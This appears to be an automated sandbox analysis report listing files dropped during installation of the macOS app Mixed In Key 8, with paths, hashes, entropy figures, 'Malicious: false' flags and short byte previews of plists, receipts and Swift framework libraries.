File Type:	data
Category:	dropped
Size (bytes):	45388
Entropy (8bit):	3.4864642286786443
Encrypted:	false
SSDEEP:	24:x9ZnaN6000000000000000000000000N000000000000000000000000000000Nn:xfUunpIi3/9U05jjMzKLxf6f6iNpq
MD5:	CDB6F9B0FFBBC8237CB34D3E9E1CE7A5
SHA1:	6B6211B935C18C3474799D15B764CED02E735226
SHA-256:	FB30F968869BC512F59DB9EB619F4D055723E1861FA2C5A647F208BFAA02D32A
SHA-512:	6EA7549218F3FFF366273D56E99115C19190D8B256590FD235DFE196E9E4FEF4201A9148FB5993BFC7BA5DD9C815EF0C78810E2B0D02EAEA19F3A6AFF5162178
Malicious:	false
Preview:	..d.=..._t.....}......y..,J.6<.."a........x6<.."a....7...x6<.."a..t....Sq6<.."a..VTZ..'......N.......xB....7.,. {4.m6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/dev/null Download File
Process:	/usr/bin/osascript
File Type:	ASCII text
Category:	dropped
Size (bytes):	611
Entropy (8bit):	5.329297563299439
Encrypted:	false
SSDEEP:	12:yJnlOmeAvGALAK9AmqoJnlOmeAvGALAKYrPyJnkOmeAvGALAKu+EOIh6FsOlHqWn:UrpucAMrpuTrMktpu7pusOdRDRjaRj4v
MD5:	679EC268EFE069AD13EAE676B426F9E2
SHA1:	9142CCC9160724DD83FB98C124ACA96C0E6FC294
SHA-256:	1640DB5E1C9A5C6C7009D2FE7C0248E641ED2F8CE0673647121E934675F8F5DD
SHA-512:	B2DBD39558CB2380BD26C5EDA60A9FC4348903F1EB37F18282FB9CB9E67908DDDB98019EAFCB63226C96E3835A6259404B7C653260670F4F0AE1EF1AA07FFD65
Malicious:	false
Preview:	2021-06-07 21:15:04.098 osascript[716:7806] GetInputSourceEnabledPrefs user file path = /var/root/Library/Preferences/com.apple.HIToolbox.plist.2021-06-07 21:15:04.098 osascript[716:7806] GetInputSourceEnabledPrefs effective user id path = 0.2021-06-07 21:15:04.099 osascript[716:7806] GetInputSourceEnabledPrefs user pref content = <CFBasicHash 0x7fef7b52c8c0 [0x7fffa9bf7980]>{type = immutable dict, count = 1,.entries =>..2 : <CFString 0x7fffa9b9fb78 [0x7fffa9bf7980]>{contents = "AppleCurrentKeyboardLayoutInputSourceID"} = <CFString 0x7fffa9bbdcf8 [0x7fffa9bf7980]>{contents = "com.apple.keylayout.US"}.}..

/private/var/db/.dat.nosync026b.2FVXZ6 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	182
Entropy (8bit):	5.249726358774075
Encrypted:	false
SSDEEP:	3:vFWWMNHU8LdgCfydewspvVOK+jXILg7rdDmJS4EyxNdULhBRxbvZVCWjKHUNT7b0:TMVBd/4o+tJCc4EyfdUdBRECcgfLc
MD5:	BBF1E97143F061F2AB2D3EA27FF68DA8
SHA1:	5C8DB05C0B13EB621CD0B60297B5E668544D8001
SHA-256:	744BFA50AFAE765840A8F7FEA954EA8FA6FE050384231D9C6832C19359483144
SHA-512:	1E8C2A281F47567990C40F20115CB9C8CEAEF5DEA0245EF561613575E9DC084070B146EE162937F733D7538C1C25D6978D7E42FD9DD48EEF2CFFB33B6D510242
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<array/>.</plist>.

/private/var/db/.dat.nosync0277.gybxWI Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/install_monitor
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	372
Entropy (8bit):	4.982914434460289
Encrypted:	false
SSDEEP:	6:TMVBd/4o+tJCc4EyfdUdBRECcgtodAvbBvuIvHJBvVchZCvAMcvtNxTy:TMHdgo+tJVEdQiCXtogpuGvVchZcAPbw
MD5:	1759FC0756A06F64FB0A04EEB5A15C55
SHA1:	F7EFD9D46F441CBFAB640428F50F99FA4412049C
SHA-256:	97ECCE72E2D582806BB7852FF846DBF7B881112870C9B9EA43F8C31CD16529A8
SHA-512:	7552D8995140727C6C20CC691735EF5271DBBBB3E2CAD295AE500D5ACC9E60D0237601F89AB4843DD287A2BC0848A665CB0B6AE2AC002569EC40D59464365180
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<array>..<string>/Applications</string>..<string>/Library</string>..<string>/System</string>..<string>/bin</string>..<string>/private</string>..<string>/sbin</string>..<string>/usr</string>.</array>.</plist>.

/private/var/db/receipts/com.mixedinkey.installer.bom Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mac OS X bill of materials (BOM) file
Category:	dropped
Size (bytes):	102129
Entropy (8bit):	3.9078030958047103
Encrypted:	false
SSDEEP:	3072:IcE53Fi15pkGgwGmuaRNiFU0SmZWMj6HdH:IcE53Fi1cGgwGmuajGU0SmZWMj6HdH
MD5:	0F07CB15D467ADBA0A80120EF583D92C
SHA1:	9A66033FCBBD2C4A4AD82D173B7D686FEBCD7509
SHA-256:	977D7B35B060620E979CD8337EF0E4972AFC08388986354B7A6B57763D0450D4
SHA-512:	E681F21EB24279DD9BF4F9C9F339F075E6E948D497FB42C4BF614425C4C62BAE8FB9E71D9EFC61A50F3D6957C211AAEBBC20D36836A0D212D96950C252F93561
Malicious:	false
Preview:	BOMStore..........9i..U...#"...<.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................nfo............tree.................Paths......................................................................."...!...(...'...................%...$...................Q...P...........F...E...c...b...N...M...B...A...........!... ...C...B...-...,...................$...#...:...9...........Z...Y...................@...?...................1...0...........9...8...4...3...................7...6...K...J...]...\...y...x...........?...>...l...k...W...V...........`..._.......-...*..

/private/var/db/receipts/com.mixedinkey.installer.plist Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	258
Entropy (8bit):	5.420628927898976
Encrypted:	false
SSDEEP:	6:NEjgWH5Mdla61cjeBJLWCXLU8DBXoO769q6PplZOXtiXTtgY:2j3Hy1VBdWCbU8BX976vbZOXtijmY
MD5:	5A870F8257E2DFB939DD9510550A5BB7
SHA1:	229815FE9D7B340F25B90273CE7ADF9AB32A0457
SHA-256:	5D9BC6A38FC0BE763B7F39FB299810F2533C48AB9A2D35ECF6A14EAC559D37F7
SHA-512:	B9D54BFBD9AAB5E12F9530D3877BA479FCCFA58366208D4F992B12D0BC091FA49C5BF200193D775BEAF51206B9B4AFEE8579658930610BB71AE3C15A890CF1C2
Malicious:	false
Preview:	bplist00.............^PackageVersion_..PackageIdentifier_..InstallPrefixPath[InstallDate_..PackageFileName_..InstallProcessNameU8.5.3_..com.mixedinkey.installer\Applications3A.7S..m/_..Mixed_In_Key_8.pkgYInstaller..$8LXj......................................

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Boms/com.mixedinkey.installer.bom Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mac OS X bill of materials (BOM) file
Category:	dropped
Size (bytes):	102129
Entropy (8bit):	3.9078030958047103
Encrypted:	false
SSDEEP:	3072:IcE53Fi15pkGgwGmuaRNiFU0SmZWMj6HdH:IcE53Fi1cGgwGmuajGU0SmZWMj6HdH
MD5:	0F07CB15D467ADBA0A80120EF583D92C
SHA1:	9A66033FCBBD2C4A4AD82D173B7D686FEBCD7509
SHA-256:	977D7B35B060620E979CD8337EF0E4972AFC08388986354B7A6B57763D0450D4
SHA-512:	E681F21EB24279DD9BF4F9C9F339F075E6E948D497FB42C4BF614425C4C62BAE8FB9E71D9EFC61A50F3D6957C211AAEBBC20D36836A0D212D96950C252F93561
Malicious:	false
Preview:	BOMStore..........9i..U...#"...<.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................nfo............tree.................Paths......................................................................."...!...(...'...................%...$...................Q...P...........F...E...c...b...N...M...B...A...........!... ...C...B...-...,...................$...#...:...9...........Z...Y...................@...?...................1...0...........9...8...4...3...................7...6...K...J...]...\...y...x...........?...>...l...k...W...V...........`..._.......-...*..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/.BC.T_yHpOuA Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	3293
Entropy (8bit):	5.120378073910887
Encrypted:	false
SSDEEP:	96:CyvH2tB8LtOk7cS16G0gqVrcwcGtdFD9tl4oJEgqThg:XvhLXK
MD5:	EB5BA03F7E18E66F902C3080682D4476
SHA1:	F9FB20C25769BF24B717A18755D442B00F91EE9B
SHA-256:	25462EB1953770CB4B44669D2480C5B772A977DE699CAA181C408F20835790AB
SHA-512:	67F30B0ACE358BF41322235C10262F44324F2B8E11B50702FF95AFD52C39934EDFCC16D7009332DD60CDFB4A416B1A375474637ACFD58F319BC08CD987408DC5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>ATSApplicationFontsPath</key>..<string>fonts</string>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleDocumentTypes</key>..<array>...<dict>....<key>CFBundleTypeExtensions</key>....<array>.....<string>miktheme</string>....</array>....<key>CFBundleTypeName</key>....<string>Theme</string>....<key>CFBundleTypeRole</key>....<string>Viewer</string>....<key>LSTypeIsPackage</key>....<true/>....<key>NSPersistentStoreTypeKey</key>....<string>XML</string>...</dict>...<dict>....<key>CFBundleTypeExtensions</key>....<array>.....<string>mp3</string>.....<string>mp4</string>.....<string>m4p</string>.....<string>m4a</string>.....<string>wav</string>.....<string>aif</string>.....<string>aiff</string>.....<string>flac</string>....</array>....<key

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_282o63 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	77792
Entropy (8bit):	4.101071723494362
Encrypted:	false
SSDEEP:	768:2wwKv5kC5WkwwxGlsi/savhkvUt68oSDyW+Cjv1YYA6FJXiUaYJlbv1dY2BI2kOe:+28kwwxGlsi0MkvUthVvba6Ge8vK
MD5:	F341E889720FCDDF41C1B3B1AD41B8B2
SHA1:	EC8BCCAAF5B4075969C342649FD2F5042957A749
SHA-256:	BD9E58DF5A0DA43F45E91D7AF8F227201C2F6E026701F577E266341EFEC04974
SHA-512:	DB8D6808CCB99EF4FFA7EE146647B8B0B93C97875C5635B1D698BF13F4301DD770E3915AF02C844B4BD360BF8C40F9C368E739BA240A1E86B270F791C192100B
Malicious:	false
Preview:	........................................__TEXT..........................................................__text..........__TEXT..........._..............._..............................__stubs.........__TEXT..........<q......x.......<q..............................__stub_helper...__TEXT...........q...............q..............................__objc_methname.__TEXT...........r......I........r..............................__const.........__TEXT...........}......R........}..............................__cstring.......__TEXT..........@~......%.......@~..............................__info_plist....__TEXT..........e.......?.......e...............................__unwind_info...__TEXT.................. .......................................__eh_frame......__TEXT.................8..........................................X...__DATA................... ............... ......................__nl_symbol_ptr.__DATA..........................................................__got...........__DATA..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_3wqJNg Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	5.91467987599657
Encrypted:	false
SSDEEP:	6144:DB1mNsU/gHNiAU1tspwOydv543kRBC8VzC/r/xXf/Zc:DLmNsnEF1tYL9
MD5:	635674CC13B781ACCB0D19DCC799B7A5
SHA1:	F8A6ECA72C462898CD00492263A49251D9D657CF
SHA-256:	7BFEBFF3964C0C2ED3FD4D697A5B787710ACCB1C2820198FAE1241081625135E
SHA-512:	AB1B6B9EE46956E382EFB9DC395B28365986F87C649254D9700DBB191A28250FCF2EE3B76B68D3167A85EA0EA8D315D77997E20A9BD8D484CB19333FBD7DCC5F
Malicious:	false
Preview:	....................p...............8...__TEXT..........................................................__text..........__TEXT...........A......9/.......A..............................__stubs.........__TEXT...........p......6........p..............................__stub_helper...__TEXT..........0t......j.......0t..............................__const.........__TEXT...........y...............y..............................__cstring.......__TEXT..................U.......................................__swift3_typeref__TEXT..................d.......................................__swift3_capture__TEXT..........d.......P.......d...............................__swift3_reflstr__TEXT..................L.......................................__swift3_fieldmd__TEXT..........................................................__swift3_assocty__TEXT..........................................................__swift2_proto..__TEXT.................p......................................__swift2_types..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_6lq4qy Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	98496
Entropy (8bit):	5.406334713118758
Encrypted:	false
SSDEEP:	1536:TYFvS/SQfcfl0mJ15X4kEYTyX5UNo4mFCiLXc36awSK:TYFvS/SQa0OjX0Yi6aCiLXc3TZ
MD5:	53EBCB72C82ACCA0858624E133DC8C75
SHA1:	C4E5A57D8EF0343966FA7172CA4F754C79010C60
SHA-256:	6563157FD2A72CCDDB7D4167B7491A424AB3B98183E3DFF14F010401A6FDB35A
SHA-512:	015D4EB149C4294A9D72197D5E1B98E5D22CC5EC50C3FB4F92339EF7D6490FC6EC3C8EE17A369D99FBA33B9BF29C60ADDFDF2D7774354F0457A30C1E406BD7B5
Malicious:	false
Preview:	........................................__TEXT..........................................................__text..........__TEXT..........@&.......F......@&..............................__stubs.........__TEXT...........l......d........l..............................__stub_helper...__TEXT..........Po..............Po..............................__const.........__TEXT..........`s..............`s..............................__cstring.......__TEXT.......... u.............. u..............................__swift3_typeref__TEXT...........u...............u..............................__swift3_capture__TEXT...........w......P........w..............................__swift3_reflstr__TEXT..........Xw..............Xw..............................__swift3_fieldmd__TEXT..........`w..............`w..............................__swift3_builtin__TEXT..........\|w......(.......\|w..............................__swift3_assocty__TEXT...........w......H........w..............................__swift2_proto..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_CK8OV0 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	49360
Entropy (8bit):	2.710370255582302
Encrypted:	false
SSDEEP:	384:/pcoiVr+Q8YrOriDrO/T3rNab8ertRBS:/pcoi780cab8OBS
MD5:	139214132CDC6BD1268529A5A05DAAFA
SHA1:	30257878B482F5C8A9C2489DEA5433EAF7017781
SHA-256:	1EE5558DFF8206B9CB580C09E3ED40AE7C7DC1FA122E30669041FFCCDB44B1AA
SHA-512:	3A1FE9FD5A430E31083F7B50959FFA5075BC71195E0E2F2362685AE685EBF45231D97B9D1FE3BFABB12F8FB464C129376FC3F2290AFD01D54DF07F65F9EAF2F3
Malicious:	false
Preview:	....................................8...__TEXT...................`...............`......................__text..........__TEXT...........]...............]..............................__const.........__TEXT...........]...............]..............................__info_plist....__TEXT...........]......G........]..................................8...__DATA...........`...............`..............................__objc_imageinfo__DATA...........`...............`..............................__data..........__DATA...........`......H........`..............................__common........__DATA..........P`..................................................H...__LINKEDIT.......p.......`.......p.......P..........................8...........6.......@rpath/libswiftCoreImage.dylib.."...0............p.......................q..0............q...... s..@.......P...................................................................................Az...9....'v..$...............*.........`.........`...

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_DLZkCD Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	2858224
Entropy (8bit):	6.506547716239084
Encrypted:	false
SSDEEP:	49152:DCTEryyr9hAlJe9SIWd+KjDAoqjIQ8xMKsMS5825C8hsUzArH3dzsyHO/AjSr3Yf:fyyrY8vsGgF
MD5:	B912D7A34E7F3414CF3E2FFADCFA2DBE
SHA1:	314C1C2C620BDBE578A527484803FCEB300ECB56
SHA-256:	A2813BBB6B4E5B42A319CCD09451846B0D814F5D29B27F27BAFE3750DEDD2BD2
SHA-512:	DB174DB61FF5FDDFE968A8629CD94E62CDC7D544ED8311F84D03045482C92D475E5D5700493C03EE9C080D4650474E48090E962204840F72D55A0CEB7E51D511
Malicious:	false
Preview:	....................`...................__TEXT...................P...............P......................__text..........__TEXT..........p\..............p\..............................__stubs.........__TEXT..........\l..............\l..............................__stub_helper...__TEXT...........t......R........t..............................__const.........__TEXT..........@........U......@...............................__cstring.......__TEXT...................5......................................__objc_methname.__TEXT..................^8......................................__swift3_typeref__TEXT...........G.......=.......G..............................__swift3_capture__TEXT..........................................................__swift3_reflstr__TEXT..........................................................__swift3_fieldmd__TEXT..........0.......l.......0...............................__swift3_assocty__TEXT..........................................................__swift2_proto..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_FxyJp8 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	58464
Entropy (8bit):	4.421574151237082
Encrypted:	false
SSDEEP:	384:O0GSQlDEEqgR/XbKoWKP4T1oyl8ih00UJWhypl3enSJjw7cWDgr+Q8YrOrGJ7rOe:O0GN/G/KP4T/l/h69zxjw7VDi8dab8U
MD5:	AE149F9D463448FC54E64C94EE57DBBC
SHA1:	D25B63373E7158715C43F83B6A740061FF99D36B
SHA-256:	D9908207551DB3A493B8156F077BBF61560892C3CD852D91F09C2379BD388173
SHA-512:	9CA169496324850F92AE330CDB931155BAD9AEA6C77E855D00289546C61FDD92E1126F10D5533F740E4E7CEF729DEA50B28E6916EC52AA84526011EB1BE4CF13
Malicious:	false
Preview:	........................................__TEXT...................`...............`......................__text..........__TEXT...........8...............8..............................__stubs.........__TEXT..........jW..............jW..............................__stub_helper...__TEXT..........lX..............lX..............................__swift3_typeref__TEXT..........Z......G.......Z..............................__swift3_capture__TEXT..........tZ......@.......tZ..............................__cstring.......__TEXT...........Z...............Z..............................__swift3_fieldmd__TEXT..........T[..............T[..............................__swift3_builtin__TEXT..........d[..............d[..............................__const.........__TEXT..........x[..............x[..............................__info_plist....__TEXT..........z[......9.......z[..............................__unwind_info...__TEXT...........]...............]..............................__eh_frame......

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_IGZD8x Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	197168
Entropy (8bit):	5.668594966500052
Encrypted:	false
SSDEEP:	3072:SXulGXWANjh+1ngJC6PMPl1mSf3n41aeZBuJMIOkSfGecpH74JBs7WcxeZW:SVp7klBXE+eLcxeA
MD5:	EE6765DD7401F4FCECFC03E86B96DD88
SHA1:	E816BCEAC6D4F126F513319EEC1477B5866A66D2
SHA-256:	E643E6C1EE5945495B512BB4888133805EE1D599CE7D7F5B309CD5E29565C65B
SHA-512:	16680AE48E7638189B69C9A7FE90137FE787E275A71A2709186730CE3F110D1FC4039EBFB017DEA8775D82CEC98DB534EE327879591DF9DE36CC8A5AF33F768B
Malicious:	false
Preview:	....................x...................__TEXT...................0...............0......................__text..........__TEXT..........`M..............`M..............................__stubs.........__TEXT..........<.......<.......<...............................__stub_helper...__TEXT..........x.......t.......x...............................__const.........__TEXT..........................................................__cstring.......__TEXT..........................................................__swift3_typeref__TEXT..................@.......................................__swift3_fieldmd__TEXT........... ......T........ ..............................__swift3_reflstr__TEXT..........D!..............D!..............................__swift3_capture__TEXT..........\!..............\!..............................__swift3_assocty__TEXT..........."..............."..............................__swift2_proto..__TEXT..........."..............."..............................__info_plist....

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_OJuoG6 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|BINDS_TO_WEAK\|NO_REEXPORTED_DYLIBS\|HAS_TLV_DESCRIPTORS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	6160784
Entropy (8bit):	6.454677329710664
Encrypted:	false
SSDEEP:	98304:NXwF677yUEsbs9XI4zFrLIdVhq9APhf3kESUDejn+:N5vyUEsbs944F4g
MD5:	AA6CD3EC59353F17E55A42B57E9BB826
SHA1:	B33C2523B526B72767179A203C3E1506B8D98A1B
SHA-256:	7B93344A8F57714DC6A7247A02183A4F96C2FF7F3194707D7A7F30B526C91133
SHA-512:	7FAFC3A54BD5723AA2F073B00A9C29A3B9C7542F59EA2D3DAB121702FEA737B5BDB70BC9A318764E0BD540755694CF80AD0776DE168B15F243D1AD9B550453EB
Malicious:	false
Preview:	........................................__TEXT...................@5..............@5.....................__text..........__TEXT...........8........1......8..............................__stubs.........__TEXT............1...............1.............................__stub_helper...__TEXT............1...............1.............................__const.........__TEXT............1.....0.........1.............................__cstring.......__TEXT.......... .2............. .2.............................__objc_methname.__TEXT...........;3.....h........;3.............................__swift3_typeref__TEXT..........PB3......r......PB3.............................__swift3_capture__TEXT...........3.....8........3.............................__swift3_reflstr__TEXT.......... .3............. .3.............................__swift3_fieldmd__TEXT............3.....X<........3.............................__ustring.......__TEXT..........8.4.............8.4.............................__swift3_assocty

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_P7ITqX Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	44976
Entropy (8bit):	3.5060094976286664
Encrypted:	false
SSDEEP:	192:vAKTzvnls/3wlPQgI9/zr+RjG8P0Bzrj376zroKRDH0rSe8Rrv75alZ8P09r8:vHlI3k/I9rr+Q8YrWrtqrSHrNab8er
MD5:	CE8D359F3C1F7AB946DE28442AF91965
SHA1:	3E216CD55AFE082790C86948723E28AD55895AD5
SHA-256:	7B40A612D8E0C149E4ABEF89A2FA4CC64DC3B345E9EDD49AE9BB37EEF671EB79
SHA-512:	9A9EBF058AD995B6A7205BB5CDDFE8F66E657F896D08F7E136BA1082C7A36D00676074EA7152ABFFE9DE45B95269FDD05DA4AF8A575421740ED562302F6A0898
Malicious:	false
Preview:	....................h...............(...__TEXT...................@...............@......................__text..........__TEXT...........:......z........:..............................__stubs.........__TEXT..........:=..............:=..............................__stub_helper...__TEXT..........L=..............L=..............................__const.........__TEXT..........z=..............z=..............................__info_plist....__TEXT..........\|=......;.......\|=..............................__unwind_info...__TEXT...........?......H........?..................................x...__DATA...........@...............@..............................__got...........__DATA...........@...............@..............................__nl_symbol_ptr.__DATA...........@...............@..............................__la_symbol_ptr.__DATA...........@...............@..............................__objc_imageinfo__DATA...........@...............@..............................__data..........__DATA..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_P7av4Y Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	40896
Entropy (8bit):	3.111296069283955
Encrypted:	false
SSDEEP:	384:p9iFgOK0r+Q8YrWr7CzMQrO/T3rNab8er:p9iFgi8Fvab8
MD5:	948563D62566560D4CAE6E68E8EF3F3F
SHA1:	962326E5D28D8287D9C4EADF800F93E8FBCE4116
SHA-256:	7D24B806B32C9AB86A0FC14B7857361F29FF6BAA4C343FDB9F04C424298288DA
SHA-512:	AF57C37D2EE429DCA5F7F7F25D5376DF0F5A476D734CCCDD15E3941EFB17CAC2EF16C7385D71C37FF557E6176478391B2DCC148F7115431475FE4BA54D8DC84C
Malicious:	false
Preview:	........................................__TEXT...................@...............@......................__text..........__TEXT..........`<......N.......`<..............................__stubs.........__TEXT...........<...............<..............................__stub_helper...__TEXT...........<......8........<..............................__swift3_typeref__TEXT...........=...............=..............................__swift3_fieldmd__TEXT.......... =.............. =..............................__cstring.......__TEXT..........0=......!.......0=..............................__const.........__TEXT..........T=..............T=..............................__info_plist....__TEXT..........^=......Q.......^=..............................__unwind_info...__TEXT...........?......P........?..................................(...__DATA...........@...............@..............................__nl_symbol_ptr.__DATA...........@...............@..............................__la_symbol_ptr.__DATA..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_PoqHP2 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	69936
Entropy (8bit):	4.938009084056817
Encrypted:	false
